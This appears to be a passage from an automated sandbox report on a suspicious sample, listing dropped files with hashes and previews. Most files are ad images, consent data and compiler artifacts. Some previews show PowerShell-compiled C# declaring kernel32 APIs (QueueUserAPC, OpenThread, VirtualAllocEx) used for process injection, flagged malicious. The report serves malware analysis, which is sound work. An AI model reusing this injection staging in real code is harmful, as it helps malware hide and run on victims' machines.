File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	8917
Entropy (8bit):	7.934903174709937
Encrypted:	false
SSDEEP:	192:/8QgK10asMKnc2+YhXLoCke8E0y+Jj/s50iH71mZwtF0e5FaSx:/8Qgfasxn9tXECR0yYj050CptKemSx
MD5:	1E5A0289B8ED6133340F70DBDACE3025
SHA1:	BE0AEA8EF7CD88CFED4DDFA86336DE5F59081DD5
SHA-256:	A3D485A5F211A2E172556261CC3181CD059441F998A30DCF1E3A8837C861569B
SHA-512:	8BA7D5330E65B631DA7CB68463D4F67F600A25B44291EDA96080B498E50A252738A269A696FC1636411D17B5265DE2C65A80A38B5C7F4E2B31237097E57EE0E6
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1253-DE-Aseel-woman-ear-from-side1200x800_1000x600_95b70183091facf1b0f2aa5b71bf2410.png
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...."..........6.....................................................................q..F."......).....H..D8H@...!s.^S.W...0..6G.v.`..........[......a6....s....%.l0..Qu...@;.a.0.sx..ip...7.xw....Y.].ud.!-..!..+...RvA.i.u...\..F...9F.F.C.g.x.`u.r= ..KT.ft..H..Of.....P.~}5.5..ty]so.EW...I.\|.y.W..g.W....\|3j0Y3V.h....`h....0...A.......{..n-..}..}.<.[=..l..fy...?.+.;>...i...5h.>..x.4.p-...........;.F.WzF..v..o....k@.z.D.X...6[\|......'._.x._.TL.y.{.I.Gwee..vJt.u6..E.W1e.q..&O.G...E..N.<p.J.'\..\|..........G.....4...(..'].t....he.o.N.Xo...Y.9.:....a9..Ym...<.......t..<hlAe.n....k{.....z.O..z......b..i...5...v.g......K.....{.X.....L..&.l.c..:{.Kr}.1..[.....=.b........f)&p.....k.8......_.kv.y.X.}..%u..g)F."U...N.SE...^.s7..5...72m.._.R.4..5.x<...z.6...o..f....0..\u.Z,..`...l.W.L....].....5.4X.K.A..y..

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\https___console.brax-cdn.com_creatives_b9476698-227d-4478-b354-042472d9181c_TB1827-old_Paulina_pinchy_HA_2_1200x800_1000x600_3ee933ceba847780eac9e141358e121d[1].jpg Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 207x311, frames 3
Category:	downloaded
Size (bytes):	8945
Entropy (8bit):	7.951718133201412
Encrypted:	false
SSDEEP:	192:/8ALqAhY8sdkEZw+Z3gnrcw27wqTavPRfn3G/xT+abg88HvgQVO9z:/8yvez++gQwqT+PRfn3eMabnQvgEO9z
MD5:	B624DB0D0F14A214699C77FE952E6526
SHA1:	5EABDF18C3FE359602E8E827637A62CB387A12C8
SHA-256:	8BF73C9F3AFAE1CDF7C9DECC19C8DAC7731901A6A4F355DFACAAC25F4CF5A881
SHA-512:	6BC29B4099C042760CEC3EAABC0C25D859F7CF4954ABC5B9310718F75574056740DC126DA8EFDBE0C8BEFC863FC975D19F080F82980C2B430660E0B3EA30876B
Malicious:	false
IE Cache URL:	https://img.img-taboola.com/taboola/image/fetch/f_jpg%2Cq_auto%2Ch_311%2Cw_207%2Cc_fill%2Cg_faces:auto%2Ce_sharpen/https%3A%2F%2Fconsole.brax-cdn.com%2Fcreatives%2Fb9476698-227d-4478-b354-042472d9181c%2FTB1827-old_Paulina_pinchy_HA_2_1200x800_1000x600_3ee933ceba847780eac9e141358e121d.png
Preview:	......JFIF..........................................."......".$...$.6&&6>424>LDDL_Z_\|\|.............................."......".$...$.6&&6>424>LDDL_Z_\|\|.......7...."..........5..................................................................)....X.L^X....Xj[.k4-J.'.!....._Iv.zB...W..W...<O.<.T..B.p...R..Ld........r...E.R.~J......HI\|...p..#.<$.!28n.j...}.w.HKkH{i..2.:...7....u__....g....~.....u._@Hb....A..-!.....f.R...:...J....7........P..L..Z8R..T0.1..n..............Sj.;.y.$z.....F.Ds....1.......-.C6....Te.@..VW..V...uy..E.N.:-..e.h...r-U.i ..;..).Th..5.....q.w.....s=...}......f.5.wP.&=o.I..@N../f.~..c{....S.Y.t...y......j.h.K>k.x..xd,..\.[0U.>'^..(6.....p3Z..k~0~..7.{..X....<.q...t3-.-.<...2.N.]....t.~.vL..[..........:..n... ?D\|.........~eh9..\|*...E.V.m..GV...6.\eW.......D.\|.dy..tw.8...d....3...m\|.....fBH..k'...7.......q...vC4.......'....}.w..v0..=KA...o.9.;s%5..=J.Gm.../8X"...k.@..^t..F.t.L.c.#.....:C.'.2..... ..5...#..8}.f...#e6.l.ru

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\iab2Data[1].json Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with no line terminators
Category:	downloaded
Size (bytes):	230026
Entropy (8bit):	5.150044456837813
Encrypted:	false
SSDEEP:	768:l3JqIWtk5N1cfkCHGd5btLkWUuSKQlqmPTZ1j5sIbUkjsyYAAA:l3JqIGk5Med5btLksSKkPnjNjh4A
MD5:	6AAA0F3074990A455B222A4D044E2346
SHA1:	6443AF82ED596527261B0F4367A67DD4D1BA855B
SHA-256:	1232E273F047113AB950CC141FC73D50640D2352B2ED16B89A1BAC01A80BEBEC
SHA-512:	EDE13CDE1DDEB45CD038042DCC6C1F75664EC259BC44100EB9C36361CFB657A7A661901DFEAD44DF6CEC555406A221970DF10F562AE222226546B7EFCE8E6E8D
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/consent/55a804ab-e5c6-4b97-9319-86263d365d28/iab2Data.json
Preview:	{"gvlSpecificationVersion":2,"tcfPolicyVersion":2,"features":{"1":{"descriptionLegal":"Vendors can:\n* Combine data obtained offline with data collected online in support of one or more Purposes or Special Purposes.","id":1,"name":"Match and combine offline data sources","description":"Data from offline data sources can be combined with your online activity in support of one or more purposes"},"2":{"descriptionLegal":"Vendors can:\n* Deterministically determine that two or more devices belong to the same user or household\n* Probabilistically determine that two or more devices belong to the same user or household\n* Actively scan device characteristics for identification for probabilistic identification if users have allowed vendors to actively scan device characteristics for identification (Special Feature 2)","id":2,"name":"Link different devices","description":"Different devices can be determined as belonging to you or your household in support of one or more of purposes."},"3":{"de

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\PEJLKQA8\otTCF-ie[1].js Download File
Process:	C:\Program Files (x86)\Internet Explorer\iexplore.exe
File Type:	UTF-8 Unicode text, with very long lines, with CRLF line terminators
Category:	downloaded
Size (bytes):	102879
Entropy (8bit):	5.311489377663803
Encrypted:	false
SSDEEP:	768:ONkWT0m7r8N1qpPVsjvB6z4Yj3RCjnugKtLEdT8xJORONTMC5GkkJ0XcJGk58:8kunecpuj5QRCjnrKxJg0TMC5ZW8
MD5:	52F29FAC6C1D2B0BAC8FE5D0AA2F7A15
SHA1:	D66C777DA4B6D1FEE86180B2B45A3954AE7E0AED
SHA-256:	E497A9E7A9620236A9A67F77D2CDA1CC9615F508A392ECCA53F63D2C8283DC0E
SHA-512:	DF33C49B063AEFD719B47F9335A4A7CE38FA391B2ADF5ACFD0C3FE891A5D0ADDF1C3295E6FF44EE08E729F96E0D526FFD773DC272E57C3B247696B79EE1168BA
Malicious:	false
IE Cache URL:	https://www.msn.com/_h/e012d846/webcore/externalscripts/oneTrustV2/scripttemplates/6.4.0/otTCF-ie.js
Preview:	!function(){"use strict";var c="undefined"!=typeof window?window:"undefined"!=typeof global?global:"undefined"!=typeof self?self:{};function e(e){return e&&e.__esModule&&Object.prototype.hasOwnProperty.call(e,"default")?e.default:e}function t(e,t){return e(t={exports:{}},t.exports),t.exports}function n(e){return e&&e.Math==Math&&e}function p(e){try{return!!e()}catch(e){return!0}}function E(e,t){return{enumerable:!(1&e),configurable:!(2&e),writable:!(4&e),value:t}}function o(e){return w.call(e).slice(8,-1)}function u(e){if(null==e)throw TypeError("Can't call method on "+e);return e}function l(e){return I(u(e))}function f(e){return"object"==typeof e?null!==e:"function"==typeof e}function i(e,t){if(!f(e))return e;var n,r;if(t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;if("function"==typeof(n=e.valueOf)&&!f(r=n.call(e)))return r;if(!t&&"function"==typeof(n=e.toString)&&!f(r=n.call(e)))return r;throw TypeError("Can't convert object to primitive value")}function y(e,t){retur

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\ModuleAnalysisCache Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	11606
Entropy (8bit):	4.883977562702998
Encrypted:	false
SSDEEP:	192:Axoe5FpOMxoe5Pib4GVsm5emdKVFn3eGOVpN6K3bkkjo5HgkjDt4iWN3yBGHh9sO:6fib4GGVoGIpN6KQkj2Akjh4iUxs14fr
MD5:	1F1446CE05A385817C3EF20CBD8B6E6A
SHA1:	1E4B1EE5EFCA361C9FB5DC286DD7A99DEA31F33D
SHA-256:	2BCEC12B7B67668569124FED0E0CEF2C1505B742F7AE2CF86C8544D07D59F2CE
SHA-512:	252AD962C0E8023419D756A11F0DDF2622F71CBC9DAE31DC14D9C400607DF43030E90BCFBF2EE9B89782CC952E8FB2DADD7BDBBA3D31E33DA5A589A76B87C514
Malicious:	false
Preview:	PSMODULECACHE......P.e...S...C:\Program Files\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script.........7r8...C...C:\Program Files\WindowsPowerShell\Modules\Pester\3.4.0\Pester.psd1........Describe........Get-TestDriveItem........New-Fixture........In........Invoke-Mock........InModuleScope........Mock........SafeGetCommand........Af

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	data
Category:	dropped
Size (bytes):	1192
Entropy (8bit):	5.325275554903011
Encrypted:	false
SSDEEP:	24:3aEPpQrLAo4KAxCoOu42qs5qRPje9t4CvKaBPnKdirh:qEPerB4BOu/q8qRLe9t4CvpBfuit
MD5:	5629AA2E2ED9FB76D3139103D36B7023
SHA1:	204350589138FDA6E9442A0DE7188F91FB32F98C
SHA-256:	2E3D93BF353C4E8A533BE3289D4BF4AEFC4308F52766C82791ED199A318C9E01
SHA-512:	176C4E9BE3664BDE20E0308BD669371B1850FEBD195A76B0D35C1E9BE7B4A09C4B5C872FE0701960375FF5DD60D90EAB2E7927276601742EAF16E64887B3768A
Malicious:	false
Preview:	@...e................................................@..........8................'....L..}............System.Numerics.H...............<@.^.L."My...:...... .Microsoft.PowerShell.ConsoleHost0...............G-.o...A...4B..........System..4...............[...{a.C..%6..h.........System.Core.D...............fZve...F.....x.)........System.Management.Automation4...............T..'Z..N..Nvj.G.........System.Data.4................Zg5..:O..g..q..........System.Xml..<................H..QN.Y.f............System.Management...@................Lo...QN......<Q........System.DirectoryServicesL...............7.....J@......~.......#.Microsoft.Management.Infrastructure.H................. ....H..m)aUu.........Microsoft.PowerShell.Security...<...............)L..Pz.O.E.R............System.Transactions.<................):gK..G...$.1.q........System.ConfigurationP...............-K..s.F..*.]`.,......(.Microsoft.PowerShell.Commands.ManagementD..................-.D.F.<;.nt.1........System.Configuration.Ins

C:\Users\user\AppData\Local\Temp\RES78AB.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2184
Entropy (8bit):	2.7112590154417924
Encrypted:	false
SSDEEP:	24:b7I7uHFhKdNnI+ycuZhN0TwakSfT1PNnq9qpZL6e9Ep:b7YuTKdV1ulQwa37vq9Ws
MD5:	E70D9CCC29DDEDB60D1FB5F8D9FF4585
SHA1:	DEDB97CBD775916E279B478E830FDAFF2E598A50
SHA-256:	AC6E33F97B50CDEB9FB3C28EBEE4F562CE3954AE3C398E3E5082E58B3CE21D26
SHA-512:	FD46C01EE8F18344857800CF9344F300DEA2FF734353A3A0D94CF75A3A10CDBD749F8CE850690911C0B1A1E6CF14832482350153B37FF336C9692F39EC331701
Malicious:	false
Preview:	........S....c:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP......................`.....%..........5.......C:\Users\user\AppData\Local\Temp\RES78AB.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\RES8CA0.tmp Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe
File Type:	data
Category:	dropped
Size (bytes):	2188
Entropy (8bit):	2.7114407895792554
Encrypted:	false
SSDEEP:	24:BoIm/OuHdT/hKdNnI+ycuZhN4YakSLNPNnq92pozW9I:BoImmu9TZKdV1ul4Ya3LXq9X
MD5:	40B2B5CA8116C8139F3CFDE466C0C034
SHA1:	094444AB0B1EDCA9E75964DB8E235F646871D2FA
SHA-256:	C041D4DFB3BB59FAA1EF8202A72AB939D1E3F184193006881B478DF432D2BF1D
SHA-512:	0A7C8163EA8F9B53A7EA5564C9CDA006ABB9E617E186FE7AED2BA72E0EDFB115A307AF1446A5347E93D61BE8239F6F4E65774CB01C164E84A32A4F6484A5D167
Malicious:	false
Preview:	........U....c:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP......................k......Id_............5.......C:\Users\user\AppData\Local\Temp\RES8CA0.tmp.-.<...................'...Microsoft (R) CVTRES.[.=..cwd.C:\Windows\system32.exe.C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_dti3bsys.pn3.ps1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_vykko003.u02.psm1 Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	very short file (no magic)
Category:	dropped
Size (bytes):	1
Entropy (8bit):	0.0
Encrypted:	false
SSDEEP:	3:U:U
MD5:	C4CA4238A0B923820DCC509A6F75849B
SHA1:	356A192B7913B04C54574D18C28D46E6395428AB
SHA-256:	6B86B273FF34FCE19D6B804EFF5A3F5747ADA4EAA22F1D49C01E52DDB7875B4B
SHA-512:	4DFF4EA340F0A823F15D3F4F01AB62EAE0E5DA579CCB851F8DB9DFE84C58B2B37B89903A740E1EE172DA793A6E79D560E5F7F9BD058A12A280433ED6FA46510A
Malicious:	false
Preview:	1

C:\Users\user\AppData\Local\Temp\mu1rnx1a\CSC6647FE8FE542539CE2919E5B6D2D1D.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.0970768916468527
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grymlTwak7YnqqFlT1PN5Dlq5J:+RI+ycuZhN0TwakSfT1PNnqX
MD5:	ACD31906E8B71160E102EF91C498C525
SHA1:	4609312B997BA6335BAF38EE6C59E53452B50165
SHA-256:	2EE77D306D542D6C05E2C9A5454E64326C993D1F8570437645BBA1AE2E621223
SHA-512:	FE804E05EC6424B7440D745501FB0913289333A197C21A96DAFB28D27EFC4622A8FFB9704F0F890071DB9A5E385681BBAF45EC851A19C1C0091D29D30309E4EB
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...m.u.1.r.n.x.1.a...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...m.u.1.r.n.x.1.a...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	409
Entropy (8bit):	5.052013007754227
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJv/VMRSR7a13o4OSSRa+rVSSRnA/fAqFQy:V/DTLDfu3F4O59rV5nA/TFQy
MD5:	9FD7479AC9BD39EAF111AEDEC976D3AA
SHA1:	43E99395C9BC72CE1A0280EAB7785DF4A28A7315
SHA-256:	3ADE2B51AA3CC413287C4D1C4C85E45C43143CC7871AE72387D161B564D998CF
SHA-512:	78F2086E6D4D5F72354F9FF5F8A8D58EF4F162B1F3BFCFD6D87A817980A68E61AF08CBA8B00D2ED7B33E8A75AD15416AF0B6CB9B1C4F9400FE950101AC297467
Malicious:	false
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class unnvjs. {. [DllImport("kernel32")].public static extern uint QueueUserAPC(IntPtr ebfsgcy,IntPtr wwxwfnuwpfa,IntPtr ixqmfwmf);.[DllImport("kernel32")].public static extern IntPtr GetCurrentThreadId();.[DllImport("kernel32")].public static extern IntPtr OpenThread(uint ikqvo,uint uoskv,IntPtr edyfcvneu);.. }..}.

C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.211668208612045
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923f5kw+zxs7+AEszI923f5kg9:p37Lvkmb6KzhkPWZE2hkg9
MD5:	B7051ACAF0421F0FFA1C081D9EFA4B80
SHA1:	37DA0BD98A97D64C4BC7415A3E8B3A82ABB0FE88
SHA-256:	7CB3E4522C8E00E68AC26AE16F0252D0202A0E9A30A256A545B11F04681E1C6F
SHA-512:	E0E3B8C78A39CDBA12BF9A58579F4473A1169791FA3875E5C38C1C0A219782A997BBFBFF20ABE86F75B882CB46FC1F724BDFF4D84F128120431B306FEEC6260C
Malicious:	true
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.0.cs"

C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.6295010894111046
Encrypted:	false
SSDEEP:	24:etGSH8mmDg85z79Eo1egHoP64NEtkZfHz1hkh+I+ycuZhN0TwakSfT1PNnq:6Nmb5NR/KbJHzvK+1ulQwa37vq
MD5:	5D7A071FDE3A804B04B4944D513B8D90
SHA1:	DABE7B6B36A1904DEDC6D36AC5C0F7BF6787B648
SHA-256:	AB3E2262D9140724AB204DE95837F6EA58DCF80D4F795680B03248CC3062E515
SHA-512:	C76B2DF7A717C729B7C85C0F97A69A721071A59FAD05A118F8D87D9738C130D288DD73366DF58CF95496277308648A8BFDBD6AC6DBC20F2CEC431E60DE5AA592
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W+`...........!.................$... ...@....... ....................................@..................................#..S....@.......................`....................................................... ............... ..H............text........ ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...H...#~......@...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................2.+...............#...................................... 9............ F............ Y.....P ......d.........j.....r.....~.....................d. ...d...!.d.%...d............3.6.....9.......F.......Y......................................."........<Module>.mu1rnx1a.dll.unnvjs.W32.mscorlib.S

C:\Users\user\AppData\Local\Temp\mu1rnx1a\mu1rnx1a.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
SSDEEP:	12:zKaMK4BFNn5KBZvK2wo8dRSgarZucvW3ZDPOU:zKaM5DqBVKVrdFAMBJTH
MD5:	83B3C9D9190CE2C57B83EEE13A9719DF
SHA1:	ABFAB07DEA88AF5D3AF75970E119FE44F43FE19E
SHA-256:	B5D219E5143716023566DD71C0195F41F32C3E7F30F24345E1708C391DEEEFDA
SHA-512:	0DE42AC5924B8A8E977C1330E9D7151E9DCBB1892A038C1815321927DA3DB804EC13B129196B6BC84C7BFC9367C1571FCD128CCB0645EAC7418E39A91BC2FEDB
Malicious:	false
Preview:	Microsoft (R) Visual C# Compiler version 4.7.3056.0...for C# 5..Copyright (C) Microsoft Corporation. All rights reserved.......This compiler is provided as part of the Microsoft (R) .NET Framework, but only supports language versions up to C# 5, which is no longer the latest version. For compilers that support newer versions of the C# programming language, see http://go.microsoft.com/fwlink/?LinkID=533240....

C:\Users\user\AppData\Local\Temp\yacmzdf3\CSCE6DA2C7C1B814D8F891E10CFF0A5BBCE.TMP Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	MSVC .res
Category:	dropped
Size (bytes):	652
Entropy (8bit):	3.1069691395901162
Encrypted:	false
SSDEEP:	12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5gryilYak7YnqqplNPN5Dlq5J:+RI+ycuZhN4YakSLNPNnqX
MD5:	08D3E9FE6B02B5AB1B7FED49645FD0E3
SHA1:	711855FFF2AAC1731A9D2F007300B9F33919C94C
SHA-256:	26007703E71AF072A7FC5C4A7C1FBBB5BA4B108C2DF5686CECBCF7CCC48DDC81
SHA-512:	4603552B93A793FC0914BEAF0AA8237F902D026185BF4E88E39EE92DFCAE885CF8EFC22BFB48677E0902A63D9DC4F4BB1BF46AF5600A31FA492DB1DEEE17608F
Malicious:	false
Preview:	.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...y.a.c.m.z.d.f.3...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...y.a.c.m.z.d.f.3...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...

C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text
Category:	dropped
Size (bytes):	414
Entropy (8bit):	5.0112862311676984
Encrypted:	false
SSDEEP:	6:V/DsYLDS81zuJd0PMRSRa+eNMjSSRrSBHJkSRHq1/ieA7iolWwy:V/DTLDfu309eg5rSjvu6/7iolWwy
MD5:	9E60DAE8669F4427D81524FC662E0E11
SHA1:	63CC313ED28BC014023379CBDCFAA5DE102AE47C
SHA-256:	153DE2EE6E519F011708A8F64105253F479B82D64D695D2343FAE9213D677133
SHA-512:	963CACF3B2BC7D60E0EC5D2A52C8FD6AB4E81D64B0D8C5D4409A5170B9D164DCFA1F2E7AEDAB732D198BAADF74C2DEFF82C8370BA5E2B13E8170BF94213B50CF
Malicious:	true
Preview:	.using System;.using System.Runtime.InteropServices;..namespace W32.{. public class vsswd. {. [DllImport("kernel32")].public static extern IntPtr GetCurrentProcess();.[DllImport("kernel32")].public static extern void SleepEx(uint mvgrgqg,uint scbstveeig);.[DllImport("kernel32")].public static extern IntPtr VirtualAllocEx(IntPtr lpqyi,IntPtr tfl,uint yjmgjhtw,uint gvbkpogio,uint ctoxlkyqq);.. }..}.

C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.cmdline Download File
Process:	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:	UTF-8 Unicode (with BOM) text, with very long lines, with no line terminators
Category:	dropped
Size (bytes):	371
Entropy (8bit):	5.199910933428445
Encrypted:	false
SSDEEP:	6:pAu+H2LvkuqJDdqxLTKbDdqB/6K2923fRQzxs7+AEszI923fRiA:p37Lvkmb6Kz5QWZE25N
MD5:	22B498E50AF5FB90104BE9860E004C95
SHA1:	DC6B8158DB579F3164B0A758AA2A5D4D1BE84A0B
SHA-256:	E7A25511D2A051ADAF4D12B87BF2A051BEF79A80F9F6D03132DC856387FAE7BF
SHA-512:	D3280D38478F4F148F2AD9300461DBAA0E801FB2BC755C45CE9C0872B0D845135B0877FC58C2EFCEEE8784AE63584657A78089D1FD836D6B16E5EA965645EB54
Malicious:	false
Preview:	./t:library /utf8output /R:"System.dll" /R:"C:\Windows\Microsoft.Net\assembly\GAC_MSIL\System.Management.Automation\v4.0_3.0.0.0__31bf3856ad364e35\System.Management.Automation.dll" /R:"System.Core.dll" /out:"C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll" /debug- /optimize+ /warnaserror /optimize+ "C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.0.cs"

C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.dll Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	3584
Entropy (8bit):	2.626942001030405
Encrypted:	false
SSDEEP:	24:etGSiM+WEei8MTl2CLKo90k0lZdWtqotkZftyw7I+ycuZhN4YakSLNPNnq:687qMTlRKwWWtuJtf1ul4Ya3LXq
MD5:	232786BB636DCD35517E73A1A879D8AD
SHA1:	C46CC9223EDBAD20AEB64DF2279466F1B04AC7C3
SHA-256:	B9910B0E4C208C9591763B3AB5CC57E4714B4A3F78D9BDDFC3C8E0DB70DBACF5
SHA-512:	E6736E3FD10C454AD125E0F9EB6FED71358BC2A5D2118693E3826AF64A41550DD2876764A118DC94ECD7022120D6C14E6E51FA1EEAD75D88AAB9DDA2938C9145
Malicious:	false
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....W+`...........!.................$... ...@....... ....................................@..................................#..W....@.......................`....................................................... ............... ..H............text...$.... ...................... ..`.rsrc........@......................@..@.reloc.......`......................@..B..................(....BSJB............v4.0.30319......l...P...#~......D...#Strings............#US.........#GUID.......T...#Blob...........G.........%3............................................................1................'...................................... 8............ J............ R.....P ......a.........g.....o.....z...........................a.!...a...!.a.&...a.......+.....4.:.....8.......J.......R.......................................!..........<Module>.yacmzdf3.dll.vsswd.W32.msc

C:\Users\user\AppData\Local\Temp\yacmzdf3\yacmzdf3.out Download File
Process:	C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe
File Type:	ASCII text, with CRLF, CR line terminators
Category:	modified
Size (bytes):	412
Entropy (8bit):	4.871364761010112
Encrypted:	false
